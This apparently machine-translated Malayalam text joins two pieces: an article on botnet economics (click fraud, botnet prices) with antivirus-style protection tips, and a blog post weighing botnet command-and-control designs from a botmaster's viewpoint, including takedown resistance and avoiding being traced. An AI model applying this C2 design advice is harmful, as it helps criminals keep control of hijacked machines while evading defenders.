സംശയിക്കാത്ത ഉപയോക്താക്കളുടെ രോഗബാധിതരായ കമ്പ്യൂട്ടറുകൾ ബോട്ട്നെറ്റിന്റെ കമാൻഡ് സെന്റർ ഉപയോഗിച്ച് ബോട്ട്നെറ്റ് സ്രഷ്‌ടാവിന് ഒരു IRC ചാനലിലൂടെയോ വെബ് കണക്ഷനിലൂടെയോ ലഭ്യമായ മറ്റേതെങ്കിലും മാർഗങ്ങളിലൂടെയോ ബോട്ടുകളുമായി ബന്ധപ്പെടുന്നതിലൂടെ നിയന്ത്രിക്കാനാകും. ബോട്ട്‌നെറ്റിന് അതിന്റെ ഉടമയ്‌ക്ക് വരുമാനം സൃഷ്ടിക്കാൻ ആരംഭിക്കുന്നതിന് നിരവധി ഡസൻ മെഷീനുകൾ ഒരു നെറ്റ്‌വർക്കിലേക്ക് സംയോജിപ്പിച്ചാൽ മതി. മാത്രമല്ല, ഈ വരുമാനം സോംബി നെറ്റ്‌വർക്കിന്റെ സ്ഥിരതയെയും അതിന്റെ വളർച്ചാ നിരക്കിനെയും ആശ്രയിച്ചിരിക്കുന്നു.

PPC (പേ-പെർ-ക്ലിക്ക്) സ്കീമിന് കീഴിൽ ഓൺലൈനായി പ്രവർത്തിക്കുന്ന പരസ്യ കമ്പനികൾ ഇന്റർനെറ്റിൽ പോസ്റ്റുചെയ്യുന്ന പരസ്യങ്ങളിലെ അദ്വിതീയ ക്ലിക്കുകൾക്ക് പണം നൽകുന്നു. ബോട്ട്നെറ്റ് ഉടമകളെ സംബന്ധിച്ചിടത്തോളം, അത്തരം കമ്പനികളെ വഞ്ചിക്കുന്നത് ലാഭകരമായ ബിസിനസ്സാണ്. അറിയപ്പെടുന്ന Google AdSense നെറ്റ്‌വർക്ക് ഉദാഹരണമായി എടുക്കുക. അതിൽ ഉൾപ്പെടുത്തിയിരിക്കുന്ന പരസ്യദാതാക്കൾ, "വെളിച്ചത്തിലേക്ക്" നോക്കുന്ന ഉപയോക്താവ് തങ്ങളിൽ നിന്ന് എന്തെങ്കിലും വാങ്ങുമെന്ന പ്രതീക്ഷയിൽ സ്ഥാപിച്ച പരസ്യങ്ങളിലെ ക്ലിക്കുകൾക്ക് Google-ന് പണം നൽകുന്നു.

Google, AdSense പ്രോഗ്രാമിൽ പങ്കെടുക്കുന്ന വിവിധ സൈറ്റുകളിൽ സന്ദർഭോചിതമായ പരസ്യങ്ങൾ നൽകുന്നു, ഓരോ ക്ലിക്കിന്റെയും ഒരു ശതമാനം സൈറ്റ് ഉടമയ്ക്ക് നൽകുന്നു. അയ്യോ, എല്ലാ സൈറ്റ് ഉടമകളും സത്യസന്ധരല്ല. ഒരു സോംബി നെറ്റ്‌വർക്ക് ഉപയോഗിച്ച്, ഒരു ഹാക്കർക്ക് പ്രതിദിനം ആയിരക്കണക്കിന് അദ്വിതീയ ക്ലിക്കുകൾ സൃഷ്ടിക്കാൻ കഴിയും, ഓരോ മെഷീനിൽ നിന്നും ഒന്ന്, Google-ന്റെ സംശയങ്ങൾ ഉണർത്താതെ. അങ്ങനെ പരസ്യപ്രചാരണത്തിനായി ചിലവഴിക്കുന്ന പണം ഹാക്കറുടെ പോക്കറ്റിലേക്ക് ഒഴുകും. നിർഭാഗ്യവശാൽ, അത്തരം പ്രവർത്തനങ്ങൾക്ക് ആരെങ്കിലും ഉത്തരവാദിയായ ഒരു കേസ് പോലും ഇതുവരെ ഉണ്ടായിട്ടില്ല. ക്ലിക്ക് ഫോറൻസിക്‌സിന്റെ കണക്കനുസരിച്ച്, 2008-ൽ, പരസ്യ ലിങ്കുകളിലെ എല്ലാ ക്ലിക്കുകളിലും ഏകദേശം 16-17% വ്യാജമായിരുന്നു, അതിൽ മൂന്നിലൊന്നെങ്കിലും ബോട്ട്‌നെറ്റുകൾ സൃഷ്ടിച്ചതാണ്. ചില ലളിതമായ കണക്കുകൂട്ടലുകൾ നടത്തുന്നതിലൂടെ, കഴിഞ്ഞ വർഷം ബോട്ട്നെറ്റുകളുടെ ഉടമകൾ 33,000,000 ഡോളർ "ക്ലിക്ക്" ചെയ്തതായി നിങ്ങൾക്ക് മനസ്സിലാക്കാൻ കഴിയും. മൗസ് ക്ലിക്കുകളിൽ നിന്ന് നല്ല വരുമാനം!

അക്രമികൾക്കും സത്യസന്ധമല്ലാത്ത ബിസിനസുകാർക്കും ആദ്യം മുതൽ സ്വന്തമായി ഒരു ബോട്ട്നെറ്റ് സൃഷ്ടിക്കേണ്ട ആവശ്യമില്ല. അവർക്ക് ഹാക്കർമാരിൽ നിന്ന് വിവിധ വലുപ്പത്തിലുള്ള ബോട്ട്‌നെറ്റുകളും പ്രകടനവും വാങ്ങാനോ വാടകയ്‌ക്കെടുക്കാനോ കഴിയും - ഉദാഹരണത്തിന്, പ്രത്യേക ഫോറങ്ങളുമായി ബന്ധപ്പെടുന്നതിലൂടെ.

പൂർത്തിയായ ബോട്ട്‌നെറ്റിന്റെ വിലയും അത് വാടകയ്‌ക്കെടുക്കുന്നതിനുള്ള ചെലവും അതിൽ ഉൾപ്പെടുത്തിയിരിക്കുന്ന കമ്പ്യൂട്ടറുകളുടെ എണ്ണത്തെ നേരിട്ട് ആശ്രയിച്ചിരിക്കുന്നു. ഇംഗ്ലീഷ് ഭാഷാ ഫോറങ്ങളിൽ റെഡിമെയ്ഡ് ബോട്ട്‌നെറ്റുകൾ ഏറ്റവും ജനപ്രിയമാണ്.

നൂറുകണക്കിന് ബോട്ടുകൾ അടങ്ങുന്ന ചെറിയ ബോട്ട്‌നെറ്റുകളുടെ വില $200-നും $700-നും ഇടയിലാണ്. അതേ സമയം, ഒരു ബോട്ടിന്റെ ശരാശരി വില ഏകദേശം 50 സെന്റാണ്. വലിയ ബോട്ട്‌നെറ്റുകൾക്ക് കൂടുതൽ പണം ചിലവാകും.

ഹോളണ്ടിൽ നിന്നുള്ള 19 വയസ്സുള്ള ഒരു ഹാക്കർ കുറച്ച് വർഷങ്ങൾക്ക് മുമ്പ് സൃഷ്ടിച്ച, ഷാഡോ സോംബി നെറ്റ്‌വർക്കിന് ലോകമെമ്പാടുമുള്ള 100,000 കമ്പ്യൂട്ടറുകൾ ഉണ്ടായിരുന്നു, അത് 25,000 യൂറോയ്ക്ക് വിറ്റു. ഈ പണത്തിന്, നിങ്ങൾക്ക് സ്പെയിനിൽ ഒരു ചെറിയ വീട് വാങ്ങാം, എന്നാൽ ബ്രസീലിൽ നിന്നുള്ള കുറ്റവാളി ഒരു ബോട്ട്നെറ്റ് വാങ്ങാൻ ഇഷ്ടപ്പെട്ടു.

ബോട്ട്നെറ്റ് സംരക്ഷണ ഉപകരണങ്ങൾ

1. ഒന്നാമതായി, ഇവ ആന്റി-വൈറസ് പ്രോഗ്രാമുകളും പതിവായി അപ്‌ഡേറ്റ് ചെയ്യുന്ന ഡാറ്റാബേസുകളുള്ള ഇന്റർനെറ്റ് ഭീഷണികളിൽ നിന്ന് പരിരക്ഷിക്കുന്നതിനുള്ള സമഗ്ര പാക്കേജുകളുമാണ്. അപകടസാധ്യത കൃത്യസമയത്ത് കണ്ടെത്തുന്നതിന് മാത്രമല്ല, നിങ്ങളുടെ വിശ്വസ്ത “ഇരുമ്പ് സുഹൃത്ത്” ഒരു സോമ്പിയായി മാറുന്നതിന് മുമ്പ് അത് ഇല്ലാതാക്കാനും അവ സ്പാം അല്ലെങ്കിൽ “ഡ്രോപ്പ്” സൈറ്റുകൾ അയയ്ക്കാൻ സഹായിക്കും. കാസ്പെർസ്‌കി ഇന്റർനെറ്റ് സെക്യൂരിറ്റി 2009 പോലുള്ള സമഗ്ര പാക്കേജുകളിൽ ഒരു പൊതു കമാൻഡ് സെന്റർ വഴി നിയന്ത്രിക്കാൻ കഴിയുന്ന സുരക്ഷാ ഫീച്ചറുകളുടെ പൂർണ്ണമായ ഒരു സെറ്റ് അടങ്ങിയിരിക്കുന്നു.

ആന്റി-വൈറസ് മൊഡ്യൂൾ പശ്ചാത്തലത്തിലുള്ള ഏറ്റവും പ്രധാനപ്പെട്ട സിസ്റ്റം ഏരിയകൾ സ്കാൻ ചെയ്യുകയും വൈറസുകൾ ആക്രമിക്കുന്നതിനുള്ള സാധ്യമായ എല്ലാ വഴികളും നിരീക്ഷിക്കുകയും ചെയ്യുന്നു: ഇ-മെയിൽ അറ്റാച്ച്മെന്റുകളും അപകടകരമായ വെബ്‌സൈറ്റുകളും.

പേഴ്സണൽ കമ്പ്യൂട്ടറും ഇന്റർനെറ്റും തമ്മിലുള്ള ആശയവിനിമയം ഫയർവാൾ നിരീക്ഷിക്കുന്നു. ഇത് വെബിൽ നിന്ന് ലഭിച്ചതോ അയയ്‌ക്കുന്നതോ ആയ എല്ലാ ഡാറ്റാ പാക്കറ്റുകളും പരിശോധിക്കുന്നു, ആവശ്യമെങ്കിൽ നെറ്റ്‌വർക്ക് ആക്രമണങ്ങളെ തടയുകയും സ്വകാര്യ ഡാറ്റ ഇന്റർനെറ്റിലേക്ക് രഹസ്യമായി അയയ്ക്കുന്നത് തടയുകയും ചെയ്യുന്നു.

സ്പാം ഫിൽട്ടർ നിങ്ങളുടെ മെയിൽബോക്സിനെ പരസ്യ സന്ദേശങ്ങളിൽ നിന്ന് സംരക്ഷിക്കുന്നു. അതിന്റെ ചുമതലകളിൽ ഫിഷിംഗ് ഇമെയിലുകൾ കണ്ടെത്തലും ഉൾപ്പെടുന്നു, അതിന്റെ സഹായത്തോടെ ആക്രമണകാരികൾ ഓൺലൈൻ പേയ്‌മെന്റിലേക്കോ ബാങ്കിംഗ് സിസ്റ്റങ്ങളിലേക്കോ ലോഗിൻ ചെയ്യുന്നതിനായി ഉപയോക്താവിന്റെ ഡാറ്റയെക്കുറിച്ചുള്ള വിവരങ്ങൾ എക്‌സ്‌ട്രാക്റ്റുചെയ്യാൻ ശ്രമിക്കുന്നു.

2. ഓപ്പറേറ്റിംഗ് സിസ്റ്റം, വെബ് ബ്രൗസറുകൾ, മറ്റ് ആപ്ലിക്കേഷനുകൾ എന്നിവയുടെ പതിവ് അപ്‌ഡേറ്റുകൾ, ഇവയുടെ ഡെവലപ്പർമാർ അവരുടെ സംരക്ഷണത്തിലെ നിരവധി വിടവുകളും ആക്രമണകാരികൾ ഉപയോഗിക്കുന്ന ബലഹീനതകളും കണ്ടെത്തുകയും ഇല്ലാതാക്കുകയും ചെയ്യുന്നു.

3. പ്രത്യേക എൻക്രിപ്ഷൻ പ്രോഗ്രാമുകൾ നിങ്ങളുടെ സ്വകാര്യ ഡാറ്റയെ സംരക്ഷിക്കും, ബോട്ട് ഇതിനകം കമ്പ്യൂട്ടറിലേക്ക് തുളച്ചുകയറിയിട്ടുണ്ടെങ്കിലും, അവ ആക്സസ് ചെയ്യുന്നതിന് അത് പാസ്വേഡ് തകർക്കേണ്ടതുണ്ട്.

4. സാമാന്യബുദ്ധിയും ജാഗ്രതയും. വിവിധ തരത്തിലുള്ള ഭീഷണികളിൽ നിന്ന് നിങ്ങളുടെ ഡാറ്റ പരിരക്ഷിക്കാൻ നിങ്ങൾ ആഗ്രഹിക്കുന്നുവെങ്കിൽ, നിങ്ങൾ അജ്ഞാത ഉത്ഭവമുള്ള പ്രോഗ്രാമുകൾ ഡൗൺലോഡ് ചെയ്ത് ഇൻസ്റ്റാൾ ചെയ്യരുത്, ആന്റിവൈറസ് മുന്നറിയിപ്പുകൾക്ക് വിരുദ്ധമായ ഫയലുകളുള്ള ആർക്കൈവുകൾ തുറക്കുക, ബ്രൗസർ അപകടകരമെന്ന് അടയാളപ്പെടുത്തുന്ന സൈറ്റുകൾ സന്ദർശിക്കുക തുടങ്ങിയവ.

മെറ്റീരിയൽ തയ്യാറാക്കുന്നതിൽ സഹായിച്ചതിന് കാസ്പെർസ്‌കി ലാബിന് ഞങ്ങൾ നന്ദി പറയുന്നു

പിയർ-ടു-പിയർ നെറ്റ്‌വർക്കുകളെക്കുറിച്ചുള്ള എന്റെ കുറിപ്പിന്റെ ഒരു ഡ്രാഫ്റ്റ് ഞാൻ പ്രസിദ്ധീകരിച്ചതിൽ അതിശയിക്കാനില്ല. വായനക്കാരുടെ അഭിപ്രായങ്ങൾ വളരെ സഹായകമായി. അവരാണ് ഈ ദിശയിൽ കൂടുതൽ പ്രവർത്തിക്കാൻ എന്നെ പ്രചോദിപ്പിച്ചത്. അതിൽ എന്താണ് സംഭവിച്ചത് - കട്ടിനടിയിൽ നോക്കുക.

പോസ്റ്റിന്റെ തലക്കെട്ടിൽ നിന്ന് നിങ്ങൾക്ക് കാണാനാകുന്നതുപോലെ, ഇന്ന് നമ്മൾ ബോട്ട്നെറ്റുകളെ കുറിച്ച് മാത്രമേ സംസാരിക്കൂ. ഫയൽ പങ്കിടൽ, പ്രോക്‌സി നെറ്റ്‌വർക്കുകൾ, പിയർ-ടു-പിയർ ബ്ലോഗുകൾ, p2p കറൻസി എന്നിവയെ കുറിച്ച് കുറച്ച് സമയത്തേക്ക് നമുക്ക് മറക്കാം.

"ബോട്ട്നെറ്റ്" എന്ന വാക്ക് നിയമവിരുദ്ധമായ ഒന്നായി മനസ്സിലാക്കരുത്. ഒരു ഉപയോക്താവ് അവരുടെ ട്രാഫിക്കും കമ്പ്യൂട്ടിംഗ് ഉറവിടങ്ങളും ഒരു ശാസ്ത്രീയ പ്രോജക്റ്റിലേക്ക് സംഭാവന ചെയ്യുന്നതിനായി ഒരു "ബോട്ട്" സ്വമേധയാ ഡൗൺലോഡ് ചെയ്ത് ഇൻസ്റ്റാൾ ചെയ്യുമ്പോൾ, ഇതും ഒരു ബോട്ട്നെറ്റ് ആണ്. അതനുസരിച്ച്, ഒരു ബോട്ട് മാസ്റ്റർ ഒരു കുറ്റവാളിയായിരിക്കണമെന്നില്ല. ഒരു സയൻസ് പ്രോജക്ടിൽ പ്രവർത്തിക്കുന്ന 30 ശാസ്ത്രജ്ഞരുടെ സംഘം ഒരു "ബോട്ട്മാസ്റ്റർ" കൂടിയാണ്.

1. സെർവർ വഴിയുള്ള ബോട്ട്നെറ്റ് നിയന്ത്രണം

ബോട്ടുകൾ കൈകാര്യം ചെയ്യുന്നതിനുള്ള ഏറ്റവും എളുപ്പ മാർഗം ഒരു irc/http സെർവർ പ്രവർത്തിപ്പിക്കുക എന്നതാണ്. അതിലൂടെ ബോട്ടുകൾക്ക് കമാൻഡുകൾ ലഭിക്കുകയും അതിന്റെ സഹായത്തോടെ അവയുടെ നിർവ്വഹണത്തിന്റെ ഫലം അയയ്ക്കുകയും ചെയ്യും.

എനിക്ക് കഴിയുന്നത്ര നന്നായി ഞാൻ വരയ്ക്കുന്നു :) ഈ സാഹചര്യത്തിൽ, ഒരു ചിത്രീകരണം ആവശ്യമില്ലായിരിക്കാം, എന്നാൽ ബാക്കിയുള്ള ഡ്രോയിംഗുകൾ സൃഷ്ടിക്കുന്ന ആഘാതത്തിന് നിങ്ങളെ തയ്യാറാക്കാൻ ഞാൻ തീരുമാനിച്ചു.

  • വളരെ ലളിതമായ ഒരു നടപ്പാക്കൽ, പ്രത്യേകിച്ച് IRC യുടെ കാര്യത്തിൽ.
  • വേഗത്തിലുള്ള ബോട്ട് പ്രതികരണം.
  • മുഴുവൻ നെറ്റ്‌വർക്കിലേക്കും ഒരു പ്രത്യേക ബോട്ടിലേക്കും നിങ്ങൾക്ക് കമാൻഡുകൾ നൽകാം.
  • നെറ്റ്‌വർക്കിൽ നൂറുകണക്കിന് നോഡുകൾ അടങ്ങിയിട്ടുണ്ടെങ്കിൽ, അത് കൈകാര്യം ചെയ്യാൻ DalNet-ലെ ഒരു ചാനൽ മതിയാകും. വലിയ നെറ്റ്‌വർക്കുകൾക്കായി, നിങ്ങൾക്ക് വിലകുറഞ്ഞ (ഏകദേശം 300 റൂബിൾ / മാസം) വെബ് ഹോസ്റ്റിംഗിനായി ഫോർക്ക് ഔട്ട് ചെയ്യാം.
  • HTTP യുടെ കാര്യത്തിൽ-സെർവർ മനോഹരമായ ഒരു യുഐയുടെ വികസനം വളരെ ലളിതമാക്കുന്നു. ചില വെബ് സേവനങ്ങളിൽ നമ്മൾ ഒരു ബോട്ട്നെറ്റ് ഉപയോഗിക്കുകയാണെങ്കിൽ ഇത് പ്രധാനമാണ്.
  • സെർവർ ലോഡ്. ഏറ്റവും വലിയ ബോട്ട്‌നെറ്റുകളിലെ നോഡുകളുടെ എണ്ണം ദശലക്ഷക്കണക്കിന് കണക്കാക്കുന്നു. അത്തരമൊരു ജനക്കൂട്ടത്തെ നിയന്ത്രിക്കാൻ, ഒരു സെർവർ മതിയാകില്ല.
  • സെർവറിന് എന്തെങ്കിലും സംഭവിച്ചാൽ (നെറ്റ്‌വർക്ക് പരാജയം, DDoS, ഡാറ്റാ സെന്ററിലെ തീ), നെറ്റ്‌വർക്ക് അവസാനിക്കും.
  • ഒരു സെർവർ ഫയർവാൾ ചെയ്യാൻ എളുപ്പമാണ്. ഉപയോക്താവിന്റെ കമ്പ്യൂട്ടറിലെ ദാതാവിനും Kaspersky Lab ഉൽപ്പന്നങ്ങൾക്കും ഇത് ചെയ്യാൻ കഴിയും.
  • ഒരു ബോട്ട്മാസ്റ്റർ കണ്ടെത്താൻ താരതമ്യേന എളുപ്പമാണ്. ഒരിക്കൽ ഞാൻ VPN-നെ കുറിച്ച് മറന്നു - യൂണിഫോമിൽ അതിഥികൾക്കായി കാത്തിരിക്കുക.
  • ഐആർസിയുടെ കാര്യത്തിൽ, കമാൻഡുകൾ ഓൺലൈനിൽ ബോട്ടുകൾക്ക് മാത്രമേ ലഭിക്കൂ. കമാൻഡ് അയച്ച് രണ്ട് മിനിറ്റിന് ശേഷം ബോട്ട് ചാനലിൽ പ്രവേശിച്ചാൽ, അത് "ഓഫ് ടോപ്പിക്ക്" ആയിരിക്കും.
  • IRC ചാനലിൽ പോയി ബോട്ടുകളുടെ എണ്ണവും അവയുടെ ഐപിയും നിർണ്ണയിക്കാനാകും. ഒരു പാസ്‌വേഡ് ഉപയോഗിച്ച് ചാനൽ പരിരക്ഷിക്കുന്നത് സഹായിക്കില്ല, കാരണം രണ്ടാമത്തേത് ബോട്ട് കോഡിൽ നിന്ന് തിരഞ്ഞെടുക്കുന്നത് എളുപ്പമാണ്.

2. IRC നെറ്റ്‌വർക്ക് വഴിയുള്ള നിയന്ത്രണം

മുമ്പത്തെ രീതിയുടെ പോരായ്മകൾ കൈകാര്യം ചെയ്യുന്നതിനുള്ള ഒരു ലോജിക്കൽ ഘട്ടം ഒരു സെർവറല്ല, മറിച്ച് പലതും ഉണ്ടാക്കുക എന്നതാണ്. എന്റെ അഭിപ്രായത്തിൽ, നിങ്ങളുടെ സ്വന്തം IRC നെറ്റ്‌വർക്ക് ഉയർത്തുക എന്നതാണ് ഇതിനുള്ള എളുപ്പവഴി. ഈ സാഹചര്യത്തിൽ, സെർവറുകൾക്കിടയിൽ ഡാറ്റ കൈമാറുന്നതിനുള്ള മുഴുവൻ ഉത്തരവാദിത്തവും IRC പ്രോട്ടോക്കോളിൽ വരുന്നു. ബോട്ട് വശത്ത് നിന്ന്, മുമ്പത്തെ പരിഹാരവുമായി താരതമ്യപ്പെടുത്തുമ്പോൾ ഒരു വ്യത്യാസവും ഉണ്ടാകില്ല.

  • ലളിതമായ നടപ്പാക്കൽ, സെർവറുകൾ സജ്ജീകരിക്കുന്നതിന് നിങ്ങൾ ടിങ്കർ ചെയ്യേണ്ടിവരും.
  • ബോട്ടുകൾ ഇപ്പോഴും കമാൻഡുകളോട് വേഗത്തിൽ പ്രതികരിക്കുന്നു.
  • ഒരു നിർദ്ദിഷ്ട ബോട്ടിലേക്ക് കമാൻഡുകൾ നൽകുന്നത് ഇപ്പോഴും സാധ്യമാണ്.
  • സെർവറുകൾക്കിടയിൽ ലോഡുചെയ്യൽ ബാലൻസിങ്, DDoS, ഫോഴ്‌സ് മജ്യൂറിനെതിരായ സംരക്ഷണം. ഒരു ദശലക്ഷം ബോട്ടുകളുടെ ശൃംഖലയ്ക്ക് ഒരു ഡസൻ നല്ല സെർവറുകൾ മതിയാകും.
  • ചില സെർവറുകൾ പരാജയപ്പെടുകയാണെങ്കിൽ, അവ മാറ്റിസ്ഥാപിക്കാൻ നിങ്ങൾക്ക് സമയം ലഭിക്കും.
  • IRC ഉപയോഗിക്കുകയാണെങ്കിൽഒരു ചാനലിൽ ഇരിക്കുന്ന ആയിരം ബോട്ടുകളെ ആശയക്കുഴപ്പത്തിലാക്കുന്നു, ഒന്നിലധികം ചാനലുകൾ ഉപയോഗിക്കുക. അതനുസരിച്ച്, നിങ്ങൾക്ക് നെറ്റ്‌വർക്കിന്റെ വിവിധ ഭാഗങ്ങൾക്ക് വ്യത്യസ്ത ജോലികൾ നൽകാൻ കഴിയും.
  • സെർവറുകൾ / വിഡിഎസ് എന്നിവയ്ക്കായി നിങ്ങൾ ഫോർക്ക് ഔട്ട് ചെയ്യേണ്ടിവരും.
  • നിങ്ങൾക്ക് ഒരേ സമയം എല്ലാ സെർവറുകളും ഫയർവാൾ ചെയ്യാൻ കഴിയും, അവ മാറ്റിസ്ഥാപിക്കാൻ ബോട്ട്മാസ്റ്ററിന് സമയമില്ല.
  • ബോട്ട്മാസ്റ്റർ ഇപ്പോഴും കണ്ടെത്താൻ വളരെ എളുപ്പമാണ്.
  • ഐആർസിയുടെ കാര്യത്തിൽ, ബോട്ടുകളുടെ എണ്ണവും അവയുടെ ഐപികളും ഇപ്പോഴും കാഴ്ചയിൽ തന്നെയുണ്ട്.
  • ചാനലിൽ ഇപ്പോൾ ചേർന്ന ബോട്ടുകൾ വിഷയമല്ല.

ട്രസ്റ്റ്റിംഗ് (ട്രസ്റ്റ് റിംഗ്, സർക്കിൾ / റിംഗ് ഓഫ് ട്രസ്റ്റ്) എന്ന പദം ഞാൻ ആദ്യം കേട്ടത് സഖാവ് നിക്കോളാസിൽ നിന്നാണ് കഴിഞ്ഞ പോസ്റ്റിലെ കമന്റുകളിൽ. നമ്മൾ "സെർവറുകളുടെ" പ്രവർത്തനം ബോട്ട്നെറ്റിന്റെ ഭാഗത്തെ ഏൽപ്പിക്കുന്നതിനെക്കുറിച്ചാണ് സംസാരിക്കുന്നത്.

  • സെർവറുകൾ ആവശ്യമില്ല.
  • ഒരു ട്രാസ്ട്രിംഗിൽ നൂറുകണക്കിന് നോഡുകൾ അടങ്ങിയിരിക്കാം. നിരവധി irc/http സെർവറുകൾ ഉയർത്തുന്നതും നിയന്ത്രിക്കുന്നതും എളുപ്പമല്ല.
  • ബോട്ടുകൾ എല്ലായ്പ്പോഴും ട്രാസ്ട്രിംഗിലേക്ക് ഒരു കണക്ഷൻ സൂക്ഷിക്കരുത്. പുതിയ കമാൻഡുകൾ ഉണ്ടോ എന്ന് ഓരോ 5-10 മിനിറ്റിലും പരിശോധിച്ചാൽ മതി. ഓരോ കമാൻഡിനും ഒരു TTL ഉണ്ടായിരിക്കണം, അത് ട്രാസ്ട്രിംഗിൽ സംഭരിച്ചിരിക്കുന്നു.
  • ഒരു വലിയ സംഖ്യ "സെർവറുകൾ" എല്ലാത്തരം ദുരന്തങ്ങൾക്കും നെറ്റ്‌വർക്ക് പ്രതിരോധം നൽകുന്നു. വളയത്തിന്റെ ഒരു ഭാഗം മരിക്കുമ്പോൾ, ഒരു പുതിയ ട്രാസ്ട്രിംഗ് സൃഷ്ടിക്കാൻ ബോട്ട്മാസ്റ്ററിന് കമാൻഡ് നൽകാൻ കഴിയും. അല്ലെങ്കിൽ മോതിരത്തിന്റെ നോഡുകൾക്ക് അത് സ്വയം ചെയ്യാൻ കഴിയും (ഡിജിറ്റൽ സിഗ്നേച്ചറുകളും ഒരു നിശ്ചിത ശതമാനം ട്രാസ്ട്രിംഗിന്റെ സമ്മതവും ആവശ്യമാണ്).
  • ട്രാസ്ട്രിംഗിൽ 512 നോഡുകൾ അടങ്ങിയിരിക്കട്ടെ, കുറഞ്ഞത് 50% എങ്കിലും നിരന്തരം ഓൺലൈനിലായിരിക്കും. നെറ്റ്‌വർക്കിൽ 1,000,000 ബോട്ടുകൾ ഉണ്ടെങ്കിൽ, അവ ഓരോന്നും നിരന്തരം ഓൺലൈനിലാണെങ്കിൽ, ഒരു ട്രാസ്ട്രിംഗ് നോഡിന് 4,000 ബോട്ടുകളിൽ താഴെ മാത്രമേ ഉണ്ടാകൂ. ഓരോ 10 മിനിറ്റിലും ഒരിക്കൽ ബോട്ട് കമാൻഡുകൾ അഭ്യർത്ഥിക്കുമ്പോൾ (അല്ലെങ്കിൽ ഒരു ഫലം അയയ്ക്കുന്നു), ഓരോ റിംഗ് നോഡും ഒരേസമയം ശരാശരി 7 കണക്ഷനുകൾ പ്രോസസ്സ് ചെയ്യും. ഈ വലുപ്പത്തിലുള്ള ഒരു നെറ്റ്‌വർക്കിന് അൽപ്പം, അല്ലേ?
  • എല്ലാ ബോട്ടുകളുടെയും കൃത്യമായ ലിസ്റ്റ് ബോട്ട് മാസ്റ്റർക്ക് മാത്രമേ ലഭിക്കൂ.
  • ഒരു നിർദ്ദിഷ്ട ബോട്ടിലേക്കോ ബോട്ടുകളുടെ ഗ്രൂപ്പിലേക്കോ നിങ്ങൾക്ക് കമാൻഡുകൾ നൽകാം.
  • കമാൻഡുകൾക്കുള്ള ബോട്ടുകളുടെ വേഗത്തിലുള്ള പ്രതികരണം.
  • ബോട്ട് മാസ്റ്ററെ കണ്ടെത്താൻ പ്രയാസമാണ്.

നടപ്പാക്കലിന്റെ സങ്കീർണ്ണതയാണ് ഞാൻ കാണുന്ന ഒരേയൊരു നെഗറ്റീവ്.

4. പിയർ-ടു-പിയർ നെറ്റ്‌വർക്കുകൾ

ഇന്റർനെറ്റ് ഉറവിടങ്ങൾ അനുസരിച്ച്, P2P ബോട്ട്നെറ്റുകൾ നിലവിൽ വളരെ ജനപ്രിയമാണ്. ഈ ഉറവിടങ്ങളിൽ, ഏറ്റവും ശ്രദ്ധ അർഹിക്കുന്നു. അത്തരമൊരു ശൃംഖലയിലെ ഓരോ നോഡിനും കുറച്ച് "അയൽപക്ക" നോഡുകൾ മാത്രമേ അറിയൂ. ബോട്ട്മാസ്റ്റർ നിരവധി നെറ്റ്‌വർക്ക് നോഡുകളിലേക്ക് കമാൻഡുകൾ അയയ്ക്കുന്നു, അതിനുശേഷം അത് അയൽക്കാരനിൽ നിന്ന് അയൽക്കാരിലേക്ക് കൈമാറ്റം ചെയ്യപ്പെടുന്നു.

അയൽക്കാരുടെ ലിസ്റ്റ് ഒരു പ്രത്യേക സെർവറിൽ ഒരിക്കൽ ബോട്ടുകൾക്ക് നൽകും. ഉദാഹരണത്തിന്, ഇത് ഒരു ഹാക്ക് ചെയ്ത സൈറ്റ് ആകാം. സെർവർ മറ്റൊന്നും ചെയ്യുന്നില്ല, ബോട്ട്നെറ്റിലേക്ക് നോഡുകൾ ചേർക്കുമ്പോൾ മാത്രമേ ഇത് ആവശ്യമുള്ളൂ.

  • മുമ്പത്തെ ഖണ്ഡികയേക്കാൾ കുറച്ചുകൂടി ലളിതമാണ് നടപ്പിലാക്കൽ.
  • എല്ലാ നെറ്റ്‌വർക്ക് നോഡുകളിലും കുറഞ്ഞ ലോഡ്. ഒരു ബോട്ട്നെറ്റിന്റെ വലുപ്പം പ്രായോഗികമായി പരിധിയില്ലാത്തതാണ്.
  • DDoS, നോഡ് ഷട്ട്ഡൗൺ മുതലായവയെ പ്രതിരോധിക്കും. ഒരു p2p ബോട്ട്നെറ്റ് ഫയർവാൾ ചെയ്യുന്നത് മിക്കവാറും അസാധ്യമാണ്.
  • ഐആർസിയുടെ കാര്യത്തിലെന്നപോലെ സ്ഥിരമായ കണക്ഷനുകളൊന്നുമില്ല.
  • ഞങ്ങൾക്ക് ഒരു സെർവർ ആവശ്യമാണ്, വളരെക്കാലം അല്ലെങ്കിലും.
  • നോഡുകൾ കാലാകാലങ്ങളിൽ മരിക്കുന്നു, ഇത് നെറ്റ്‌വർക്കിന്റെ കണക്റ്റിവിറ്റിയെ ബാധിക്കുന്നു.
  • എല്ലാ ബോട്ടുകളുടെയും ഒരു ലിസ്റ്റ് ലഭിക്കുന്നതിന്, ഉദാഹരണത്തിന്, ഒരു നിർദ്ദിഷ്ട സൈറ്റ് ആക്സസ് ചെയ്യാൻ നിങ്ങൾ അവരോട് നിർദ്ദേശിക്കേണ്ടതുണ്ട്. ഈ സാഹചര്യത്തിൽ, ബോട്ട് മാസ്റ്റർക്ക് മാത്രമേ ലിസ്റ്റ് ലഭിക്കൂ എന്നതിന് യാതൊരു ഉറപ്പുമില്ല.
  • ഒരു നിർദ്ദിഷ്‌ട നോഡിന് ഒരു കമാൻഡ് നൽകുന്നതിന്, ഒന്നുകിൽ നിങ്ങൾ അത് മുഴുവൻ നെറ്റ്‌വർക്കിലേക്കും അയയ്‌ക്കണം, അല്ലെങ്കിൽ നോഡിലേക്ക് നേരിട്ട് ബന്ധിപ്പിക്കണം.
  • കമാൻഡുകൾക്കുള്ള ബോട്ടുകളുടെ മന്ദഗതിയിലുള്ള പ്രതികരണം.
  • ഒരു "നീണ്ട" കമാൻഡ് അയയ്ക്കുന്നതിന്, ഉദാഹരണത്തിന്, URL-കളുടെ ഒരു ലിസ്റ്റ് ഉപയോഗിച്ച്, നിങ്ങൾ ഒരു മൂന്നാം-കക്ഷി സെർവർ ഉപയോഗിക്കേണ്ടതുണ്ട്, അല്ലാത്തപക്ഷം ബോട്ടുകളുടെ പ്രതികരണം കൂടുതൽ മന്ദഗതിയിലാകും.
  • ഏതെങ്കിലും തരത്തിലുള്ള സെർവറിന്റെ ഉപയോഗം കാരണം, മുമ്പത്തെ ഉദാഹരണത്തേക്കാൾ ഒരു ബോട്ട്മാസ്റ്റർ കണ്ടെത്തുന്നത് എളുപ്പമാണ്.

